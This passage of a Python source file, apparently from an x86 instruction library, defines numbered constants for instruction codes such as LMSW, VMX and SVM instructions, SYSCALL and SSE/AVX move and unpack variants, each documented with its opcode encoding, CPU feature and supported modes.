``RSTORSSP m64``
``F3 0F 01 /5``
``CET_SS``
``16/32/64-bit``
"""
LMSW_RM16: int = 808
"""
``LMSW r/m16``
``o16 0F 01 /6``
``286+``
``16/32/64-bit``
"""
LMSW_R32M16: int = 809
"""
``LMSW r32/m16``
``o32 0F 01 /6``
``386+``
``16/32/64-bit``
"""
LMSW_R64M16: int = 810
"""
``LMSW r64/m16``
``o64 0F 01 /6``
``X64``
``64-bit``
"""
INVLPG_M: int = 811
"""
``INVLPG m``
``0F 01 /7``
``486+``
``16/32/64-bit``
"""
ENCLV: int = 812
"""
``ENCLV``
``NP 0F 01 C0``
``OSS``
``16/32/64-bit``
"""
VMCALL: int = 813
"""
``VMCALL``
``NP 0F 01 C1``
``VMX``
``16/32/64-bit``
"""
VMLAUNCH: int = 814
"""
``VMLAUNCH``
``NP 0F 01 C2``
``VMX``
``16/32/64-bit``
"""
VMRESUME: int = 815
"""
``VMRESUME``
``NP 0F 01 C3``
``VMX``
``16/32/64-bit``
"""
VMXOFF: int = 816
"""
``VMXOFF``
``NP 0F 01 C4``
``VMX``
``16/32/64-bit``
"""
PCONFIG: int = 817
"""
``PCONFIG``
``NP 0F 01 C5``
``PCONFIG``
``16/32/64-bit``
"""
MONITORW: int = 818
"""
``MONITOR``
``a16 NP 0F 01 C8``
``MONITOR``
``16/32-bit``
"""
MONITORD: int = 819
"""
``MONITOR``
``a32 NP 0F 01 C8``
``MONITOR``
``16/32/64-bit``
"""
MONITORQ: int = 820
"""
``MONITOR``
``a64 NP 0F 01 C8``
``MONITOR``
``64-bit``
"""
MWAIT: int = 821
"""
``MWAIT``
``NP 0F 01 C9``
``MONITOR``
``16/32/64-bit``
"""
CLAC: int = 822
"""
``CLAC``
``NP 0F 01 CA``
``SMAP``
``16/32/64-bit``
"""
STAC: int = 823
"""
``STAC``
``NP 0F 01 CB``
``SMAP``
``16/32/64-bit``
"""
ENCLS: int = 824
"""
``ENCLS``
``NP 0F 01 CF``
``SGX1``
``16/32/64-bit``
"""
XGETBV: int = 825
"""
``XGETBV``
``NP 0F 01 D0``
``XSAVE``
``16/32/64-bit``
"""
XSETBV: int = 826
"""
``XSETBV``
``NP 0F 01 D1``
``XSAVE``
``16/32/64-bit``
"""
VMFUNC: int = 827
"""
``VMFUNC``
``NP 0F 01 D4``
``VMX``
``16/32/64-bit``
"""
XEND: int = 828
"""
``XEND``
``NP 0F 01 D5``
``RTM``
``16/32/64-bit``
"""
XTEST: int = 829
"""
``XTEST``
``NP 0F 01 D6``
``HLE or RTM``
``16/32/64-bit``
"""
ENCLU: int = 830
"""
``ENCLU``
``NP 0F 01 D7``
``SGX1``
``16/32/64-bit``
"""
VMRUNW: int = 831
"""
``VMRUN``
``a16 0F 01 D8``
``SVM``
``16/32-bit``
"""
VMRUND: int = 832
"""
``VMRUN``
``a32 0F 01 D8``
``SVM``
``16/32/64-bit``
"""
VMRUNQ: int = 833
"""
``VMRUN``
``a64 0F 01 D8``
``SVM``
``64-bit``
"""
VMMCALL: int = 834
"""
``VMMCALL``
``0F 01 D9``
``SVM``
``16/32/64-bit``
"""
VMLOADW: int = 835
"""
``VMLOAD``
``a16 0F 01 DA``
``SVM``
``16/32-bit``
"""
VMLOADD: int = 836
"""
``VMLOAD``
``a32 0F 01 DA``
``SVM``
``16/32/64-bit``
"""
VMLOADQ: int = 837
"""
``VMLOAD``
``a64 0F 01 DA``
``SVM``
``64-bit``
"""
VMSAVEW: int = 838
"""
``VMSAVE``
``a16 0F 01 DB``
``SVM``
``16/32-bit``
"""
VMSAVED: int = 839
"""
``VMSAVE``
``a32 0F 01 DB``
``SVM``
``16/32/64-bit``
"""
VMSAVEQ: int = 840
"""
``VMSAVE``
``a64 0F 01 DB``
``SVM``
``64-bit``
"""
STGI: int = 841
"""
``STGI``
``0F 01 DC``
``SKINIT or SVM``
``16/32/64-bit``
"""
CLGI: int = 842
"""
``CLGI``
``0F 01 DD``
``SVM``
``16/32/64-bit``
"""
SKINIT: int = 843
"""
``SKINIT``
``0F 01 DE``
``SKINIT or SVM``
``16/32/64-bit``
"""
INVLPGAW: int = 844
"""
``INVLPGA``
``a16 0F 01 DF``
``SVM``
``16/32-bit``
"""
INVLPGAD: int = 845
"""
``INVLPGA``
``a32 0F 01 DF``
``SVM``
``16/32/64-bit``
"""
INVLPGAQ: int = 846
"""
``INVLPGA``
``a64 0F 01 DF``
``SVM``
``64-bit``
"""
SETSSBSY: int = 847
"""
``SETSSBSY``
``F3 0F 01 E8``
``CET_SS``
``16/32/64-bit``
"""
SAVEPREVSSP: int = 848
"""
``SAVEPREVSSP``
``F3 0F 01 EA``
``CET_SS``
``16/32/64-bit``
"""
RDPKRU: int = 849
"""
``RDPKRU``
``NP 0F 01 EE``
``PKU``
``16/32/64-bit``
"""
WRPKRU: int = 850
"""
``WRPKRU``
``NP 0F 01 EF``
``PKU``
``16/32/64-bit``
"""
SWAPGS: int = 851
"""
``SWAPGS``
``0F 01 F8``
``X64``
``64-bit``
"""
RDTSCP: int = 852
"""
``RDTSCP``
``0F 01 F9``
``RDTSCP``
``16/32/64-bit``
"""
MONITORXW: int = 853
"""
``MONITORX``
``a16 NP 0F 01 FA``
``MONITORX``
``16/32-bit``
"""
MONITORXD: int = 854
"""
``MONITORX``
``a32 NP 0F 01 FA``
``MONITORX``
``16/32/64-bit``
"""
MONITORXQ: int = 855
"""
``MONITORX``
``a64 NP 0F 01 FA``
``MONITORX``
``64-bit``
"""
MCOMMIT: int = 856
"""
``MCOMMIT``
``F3 0F 01 FA``
``MCOMMIT``
``16/32/64-bit``
"""
MWAITX: int = 857
"""
``MWAITX``
``NP 0F 01 FB``
``MONITORX``
``16/32/64-bit``
"""
CLZEROW: int = 858
"""
``CLZERO``
``a16 0F 01 FC``
``CLZERO``
``16/32-bit``
"""
CLZEROD: int = 859
"""
``CLZERO``
``a32 0F 01 FC``
``CLZERO``
``16/32/64-bit``
"""
CLZEROQ: int = 860
"""
``CLZERO``
``a64 0F 01 FC``
``CLZERO``
``64-bit``
"""
RDPRU: int = 861
"""
``RDPRU``
``0F 01 FD``
``RDPRU``
``16/32/64-bit``
"""
LAR_R16_RM16: int = 862
"""
``LAR r16, r/m16``
``o16 0F 02 /r``
``286+``
``16/32/64-bit``
"""
LAR_R32_R32M16: int = 863
"""
``LAR r32, r32/m16``
``o32 0F 02 /r``
``386+``
``16/32/64-bit``
"""
LAR_R64_R64M16: int = 864
"""
``LAR r64, r64/m16``
``o64 0F 02 /r``
``X64``
``64-bit``
"""
LSL_R16_RM16: int = 865
"""
``LSL r16, r/m16``
``o16 0F 03 /r``
``286+``
``16/32/64-bit``
"""
LSL_R32_R32M16: int = 866
"""
``LSL r32, r32/m16``
``o32 0F 03 /r``
``386+``
``16/32/64-bit``
"""
LSL_R64_R64M16: int = 867
"""
``LSL r64, r64/m16``
``o64 0F 03 /r``
``X64``
``64-bit``
"""
STOREALL: int = 868
"""
``STOREALL``
``0F 04``
``286``
``16/32-bit``
"""
LOADALL286: int = 869
"""
``LOADALL``
``0F 05``
``286``
``16/32-bit``
"""
SYSCALL: int = 870
"""
``SYSCALL``
``0F 05``
``SYSCALL``
``16/32/64-bit``
"""
CLTS: int = 871
"""
``CLTS``
``0F 06``
``286+``
``16/32/64-bit``
"""
LOADALL386: int = 872
"""
``LOADALL``
``0F 07``
``386``
``16/32-bit``
"""
SYSRETD: int = 873
"""
``SYSRET``
``0F 07``
``SYSCALL``
``16/32/64-bit``
"""
SYSRETQ: int = 874
"""
``SYSRETQ``
``o64 0F 07``
``SYSCALL``
``64-bit``
"""
INVD: int = 875
"""
``INVD``
``0F 08``
``486+``
``16/32/64-bit``
"""
WBINVD: int = 876
"""
``WBINVD``
``0F 09``
``486+``
``16/32/64-bit``
"""
WBNOINVD: int = 877
"""
``WBNOINVD``
``F3 0F 09``
``WBNOINVD``
``16/32/64-bit``
"""
CL1INVMB: int = 878
"""
``CL1INVMB``
``0F 0A``
``CL1INVMB``
``16/32-bit``
"""
UD2: int = 879
"""
``UD2``
``0F 0B``
``286+``
``16/32/64-bit``
"""
RESERVEDNOP_RM16_R16_0F0D: int = 880
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 0D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F0D: int = 881
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 0D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F0D: int = 882
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 0D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
PREFETCH_M8: int = 883
"""
``PREFETCH m8``
``0F 0D /0``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHW_M8: int = 884
"""
``PREFETCHW m8``
``0F 0D /1``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHWT1_M8: int = 885
"""
``PREFETCHWT1 m8``
``0F 0D /2``
``PREFETCHWT1``
``16/32/64-bit``
"""
FEMMS: int = 886
"""
``FEMMS``
``0F 0E``
``3DNOW``
``16/32/64-bit``
"""
UMOV_RM8_R8: int = 887
"""
``UMOV r/m8, r8``
``0F 10 /r``
``386/486``
``16/32-bit``
"""
UMOV_RM16_R16: int = 888
"""
``UMOV r/m16, r16``
``o16 0F 11 /r``
``386/486``
``16/32-bit``
"""
UMOV_RM32_R32: int = 889
"""
``UMOV r/m32, r32``
``o32 0F 11 /r``
``386/486``
``16/32-bit``
"""
UMOV_R8_RM8: int = 890
"""
``UMOV r8, r/m8``
``0F 12 /r``
``386/486``
``16/32-bit``
"""
UMOV_R16_RM16: int = 891
"""
``UMOV r16, r/m16``
``o16 0F 13 /r``
``386/486``
``16/32-bit``
"""
UMOV_R32_RM32: int = 892
"""
``UMOV r32, r/m32``
``o32 0F 13 /r``
``386/486``
``16/32-bit``
"""
MOVUPS_XMM_XMMM128: int = 893
"""
``MOVUPS xmm1, xmm2/m128``
``NP 0F 10 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVUPS_XMM_XMMM128: int = 894
"""
``VMOVUPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPS_YMM_YMMM256: int = 895
"""
``VMOVUPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPS_XMM_K1Z_XMMM128: int = 896
"""
``VMOVUPS xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.0F.W0 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_YMM_K1Z_YMMM256: int = 897
"""
``VMOVUPS ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.0F.W0 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_ZMM_K1Z_ZMMM512: int = 898
"""
``VMOVUPS zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.0F.W0 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVUPD_XMM_XMMM128: int = 899
"""
``MOVUPD xmm1, xmm2/m128``
``66 0F 10 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVUPD_XMM_XMMM128: int = 900
"""
``VMOVUPD xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPD_YMM_YMMM256: int = 901
"""
``VMOVUPD ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPD_XMM_K1Z_XMMM128: int = 902
"""
``VMOVUPD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W1 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_YMM_K1Z_YMMM256: int = 903
"""
``VMOVUPD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W1 10 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_ZMM_K1Z_ZMMM512: int = 904
"""
``VMOVUPD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W1 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSS_XMM_XMMM32: int = 905
"""
``MOVSS xmm1, xmm2/m32``
``F3 0F 10 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVSS_XMM_XMM_XMM: int = 906
"""
``VMOVSS xmm1, xmm2, xmm3``
``VEX.LIG.F3.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSS_XMM_M32: int = 907
"""
``VMOVSS xmm1, m32``
``VEX.LIG.F3.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSS_XMM_K1Z_XMM_XMM: int = 908
"""
``VMOVSS xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.0F.W0 10 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSS_XMM_K1Z_M32: int = 909
"""
``VMOVSS xmm1 {k1}{z}, m32``
``EVEX.LIG.F3.0F.W0 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSD_XMM_XMMM64: int = 910
"""
``MOVSD xmm1, xmm2/m64``
``F2 0F 10 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVSD_XMM_XMM_XMM: int = 911
"""
``VMOVSD xmm1, xmm2, xmm3``
``VEX.LIG.F2.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSD_XMM_M64: int = 912
"""
``VMOVSD xmm1, m64``
``VEX.LIG.F2.0F.WIG 10 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSD_XMM_K1Z_XMM_XMM: int = 913
"""
``VMOVSD xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F2.0F.W1 10 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSD_XMM_K1Z_M64: int = 914
"""
``VMOVSD xmm1 {k1}{z}, m64``
``EVEX.LIG.F2.0F.W1 10 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVUPS_XMMM128_XMM: int = 915
"""
``MOVUPS xmm2/m128, xmm1``
``NP 0F 11 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVUPS_XMMM128_XMM: int = 916
"""
``VMOVUPS xmm2/m128, xmm1``
``VEX.128.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPS_YMMM256_YMM: int = 917
"""
``VMOVUPS ymm2/m256, ymm1``
``VEX.256.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPS_XMMM128_K1Z_XMM: int = 918
"""
``VMOVUPS xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.0F.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_YMMM256_K1Z_YMM: int = 919
"""
``VMOVUPS ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.0F.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPS_ZMMM512_K1Z_ZMM: int = 920
"""
``VMOVUPS zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.0F.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVUPD_XMMM128_XMM: int = 921
"""
``MOVUPD xmm2/m128, xmm1``
``66 0F 11 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVUPD_XMMM128_XMM: int = 922
"""
``VMOVUPD xmm2/m128, xmm1``
``VEX.128.66.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVUPD_YMMM256_YMM: int = 923
"""
``VMOVUPD ymm2/m256, ymm1``
``VEX.256.66.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVUPD_XMMM128_K1Z_XMM: int = 924
"""
``VMOVUPD xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W1 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_YMMM256_K1Z_YMM: int = 925
"""
``VMOVUPD ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W1 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVUPD_ZMMM512_K1Z_ZMM: int = 926
"""
``VMOVUPD zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W1 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSS_XMMM32_XMM: int = 927
"""
``MOVSS xmm2/m32, xmm1``
``F3 0F 11 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVSS_XMM_XMM_XMM_0F11: int = 928
"""
``VMOVSS xmm1, xmm2, xmm3``
``VEX.LIG.F3.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSS_M32_XMM: int = 929
"""
``VMOVSS m32, xmm1``
``VEX.LIG.F3.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSS_XMM_K1Z_XMM_XMM_0F11: int = 930
"""
``VMOVSS xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.0F.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSS_M32_K1_XMM: int = 931
"""
``VMOVSS m32 {k1}, xmm1``
``EVEX.LIG.F3.0F.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSD_XMMM64_XMM: int = 932
"""
``MOVSD xmm1/m64, xmm2``
``F2 0F 11 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVSD_XMM_XMM_XMM_0F11: int = 933
"""
``VMOVSD xmm1, xmm2, xmm3``
``VEX.LIG.F2.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSD_M64_XMM: int = 934
"""
``VMOVSD m64, xmm1``
``VEX.LIG.F2.0F.WIG 11 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSD_XMM_K1Z_XMM_XMM_0F11: int = 935
"""
``VMOVSD xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F2.0F.W1 11 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSD_M64_K1_XMM: int = 936
"""
``VMOVSD m64 {k1}, xmm1``
``EVEX.LIG.F2.0F.W1 11 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHLPS_XMM_XMM: int = 937
"""
``MOVHLPS xmm1, xmm2``
``NP 0F 12 /r``
``SSE``
``16/32/64-bit``
"""
MOVLPS_XMM_M64: int = 938
"""
``MOVLPS xmm1, m64``
``NP 0F 12 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVHLPS_XMM_XMM_XMM: int = 939
"""
``VMOVHLPS xmm1, xmm2, xmm3``
``VEX.128.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVLPS_XMM_XMM_M64: int = 940
"""
``VMOVLPS xmm2, xmm1, m64``
``VEX.128.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHLPS_XMM_XMM_XMM: int = 941
"""
``VMOVHLPS xmm1, xmm2, xmm3``
``EVEX.128.0F.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVLPS_XMM_XMM_M64: int = 942
"""
``VMOVLPS xmm2, xmm1, m64``
``EVEX.128.0F.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLPD_XMM_M64: int = 943
"""
``MOVLPD xmm1, m64``
``66 0F 12 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVLPD_XMM_XMM_M64: int = 944
"""
``VMOVLPD xmm2, xmm1, m64``
``VEX.128.66.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLPD_XMM_XMM_M64: int = 945
"""
``VMOVLPD xmm2, xmm1, m64``
``EVEX.128.66.0F.W1 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSLDUP_XMM_XMMM128: int = 946
"""
``MOVSLDUP xmm1, xmm2/m128``
``F3 0F 12 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VMOVSLDUP_XMM_XMMM128: int = 947
"""
``VMOVSLDUP xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSLDUP_YMM_YMMM256: int = 948
"""
``VMOVSLDUP ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSLDUP_XMM_K1Z_XMMM128: int = 949
"""
``VMOVSLDUP xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSLDUP_YMM_K1Z_YMMM256: int = 950
"""
``VMOVSLDUP ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSLDUP_ZMM_K1Z_ZMMM512: int = 951
"""
``VMOVSLDUP zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVDDUP_XMM_XMMM64: int = 952
"""
``MOVDDUP xmm1, xmm2/m64``
``F2 0F 12 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VMOVDDUP_XMM_XMMM64: int = 953
"""
``VMOVDDUP xmm1, xmm2/m64``
``VEX.128.F2.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDDUP_YMM_YMMM256: int = 954
"""
``VMOVDDUP ymm1, ymm2/m256``
``VEX.256.F2.0F.WIG 12 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDDUP_XMM_K1Z_XMMM64: int = 955
"""
``VMOVDDUP xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.F2.0F.W1 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDDUP_YMM_K1Z_YMMM256: int = 956
"""
``VMOVDDUP ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F2.0F.W1 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDDUP_ZMM_K1Z_ZMMM512: int = 957
"""
``VMOVDDUP zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F2.0F.W1 12 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLPS_M64_XMM: int = 958
"""
``MOVLPS m64, xmm1``
``NP 0F 13 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVLPS_M64_XMM: int = 959
"""
``VMOVLPS m64, xmm1``
``VEX.128.0F.WIG 13 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLPS_M64_XMM: int = 960
"""
``VMOVLPS m64, xmm1``
``EVEX.128.0F.W0 13 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLPD_M64_XMM: int = 961
"""
``MOVLPD m64, xmm1``
``66 0F 13 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVLPD_M64_XMM: int = 962
"""
``VMOVLPD m64, xmm1``
``VEX.128.66.0F.WIG 13 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLPD_M64_XMM: int = 963
"""
``VMOVLPD m64, xmm1``
``EVEX.128.66.0F.W1 13 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKLPS_XMM_XMMM128: int = 964
"""
``UNPCKLPS xmm1, xmm2/m128``
``NP 0F 14 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VUNPCKLPS_XMM_XMM_XMMM128: int = 965
"""
``VUNPCKLPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKLPS_YMM_YMM_YMMM256: int = 966
"""
``VUNPCKLPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKLPS_XMM_K1Z_XMM_XMMM128B32: int = 967
"""
``VUNPCKLPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPS_YMM_K1Z_YMM_YMMM256B32: int = 968
"""
``VUNPCKLPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 969
"""
``VUNPCKLPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 14 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKLPD_XMM_XMMM128: int = 970
"""
``UNPCKLPD xmm1, xmm2/m128``
``66 0F 14 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VUNPCKLPD_XMM_XMM_XMMM128: int = 971
"""
``VUNPCKLPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKLPD_YMM_YMM_YMMM256: int = 972
"""
``VUNPCKLPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 14 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKLPD_XMM_K1Z_XMM_XMMM128B64: int = 973
"""
``VUNPCKLPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPD_YMM_K1Z_YMM_YMMM256B64: int = 974
"""
``VUNPCKLPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKLPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 975
"""
``VUNPCKLPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 14 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKHPS_XMM_XMMM128: int = 976
"""
``UNPCKHPS xmm1, xmm2/m128``
``NP 0F 15 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VUNPCKHPS_XMM_XMM_XMMM128: int = 977
"""
``VUNPCKHPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKHPS_YMM_YMM_YMMM256: int = 978
"""
``VUNPCKHPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKHPS_XMM_K1Z_XMM_XMMM128B32: int = 979
"""
``VUNPCKHPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPS_YMM_K1Z_YMM_YMMM256B32: int = 980
"""
``VUNPCKHPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 981
"""
``VUNPCKHPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 15 /r``
``AVX512F``
``16/32/64-bit``
"""
UNPCKHPD_XMM_XMMM128: int = 982
"""
``UNPCKHPD xmm1, xmm2/m128``
``66 0F 15 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VUNPCKHPD_XMM_XMM_XMMM128: int = 983
"""
``VUNPCKHPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VUNPCKHPD_YMM_YMM_YMMM256: int = 984
"""
``VUNPCKHPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 15 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUNPCKHPD_XMM_K1Z_XMM_XMMM128B64: int = 985
"""
``VUNPCKHPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPD_YMM_K1Z_YMM_YMMM256B64: int = 986
"""
``VUNPCKHPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VUNPCKHPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 987
"""
``VUNPCKHPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 15 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVLHPS_XMM_XMM: int = 988
"""
``MOVLHPS xmm1, xmm2``
``NP 0F 16 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVLHPS_XMM_XMM_XMM: int = 989
"""
``VMOVLHPS xmm1, xmm2, xmm3``
``VEX.128.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVLHPS_XMM_XMM_XMM: int = 990
"""
